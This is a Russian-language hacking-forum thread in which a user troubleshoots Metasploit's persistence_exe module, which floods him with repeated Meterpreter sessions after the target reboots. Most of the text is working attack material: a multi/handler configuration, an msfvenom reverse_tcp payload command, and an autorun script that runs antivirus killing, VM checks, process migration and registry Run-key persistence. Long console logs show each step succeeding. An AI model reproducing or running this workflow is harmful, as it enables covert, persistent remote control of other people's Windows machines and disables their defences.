• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Циклический запуск модуля persistence_exe в metasploit после ребута удаленной системы

InetTester

Green Team
21.10.2018
308
43
BIT
5
День добрый,
Буду очень благодарен если кто то подскажет как решить данную проблемму.

имееться exploit/multi/handler на который успешно прилетают коннекты с удаленных систем

сервер:
use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST IP
set LPORT PORT
exploit -jz

скриптт:
run post/windows/manage/priv_migrate
run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1. LPORT=4444 -f exe > shell.exe

пример:
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.30:49177) at 2021
[*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49177) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2660) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2888
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0704/USER-��_20210801.0704.rc

[*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49178) at 2021-08
[*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49178) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2888) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 1036
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0711/USER-��_20210801.0711.rc
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.30:49179) at 2021-
[*] Session ID 3 (192.168.1.67:4444 -> 192.168.1.30:49179) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (1036) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2828
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0717/USER-��_20210801.0717.rc

[*] Meterpreter session 4 opened (192.168.1.67:4444 -> 192.168.1.30:49180) at 2021-08-01 07:07:17 -0400
[*] Session ID 4 (192.168.1.67:4444 -> 192.168.1.30:49180) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2828) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe


А теперь самое главное:
После ребута удаленного хоста он мне просто циклически начинает создавать кучу сессий(мне нужна всего одна, а он меня просто бомбит ими...) без остановки, не могу понять где и как это настраиваеться?
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
пробуй после перезагрузки зараженного ПК просто принять сессию без дополнительных POST правил\указаний, опиши как пройдет...
 

InetTester

Green Team
21.10.2018
308
43
BIT
5
Сори за подний ответ, я оставил в скрипте(cmd.rc) который как видно указан в: set AUTORUNSCRIPT....

только одну строчку:
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe


После запуска просто пробую добавить малварь в автозагрузку на удаленной системе(без попытки отключить антивирусы, мигрировать в другие процессы итд), в результате при первом запуске получаю кучу ошибок и получаю почему то ДВЕ сессии) :

Код:
[*] Sending stage (176195 bytes) to 192.168.1.30
[*] Meterpreter session 14 opened (192.168.1.67:4444 -> 192.168.1.30:49205) at 2021-08-06
[*] Session ID 14 (192.168.1.67:4444 -> 192.168.1.30:49205) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-
[*] Reading Payload from file /root/shell.exe
[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The process cannot access the file because it is being used by another process.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/pools/file.rb:34:in `open'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:538:in `_open'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:489:in `initialize'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:193:in `new'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:193:in `write_file_to_target'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:184:in `write

Далее после ребута удаленного хоста сессия у меня успешно поднимается.... Но вот с этими ошибками...
Код:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/pools/file.rb:34:in `open'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:538:in `_open'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:489:in `initialize'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:193:in `new'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:193:in `write_file_to_target'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:184:in `write
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!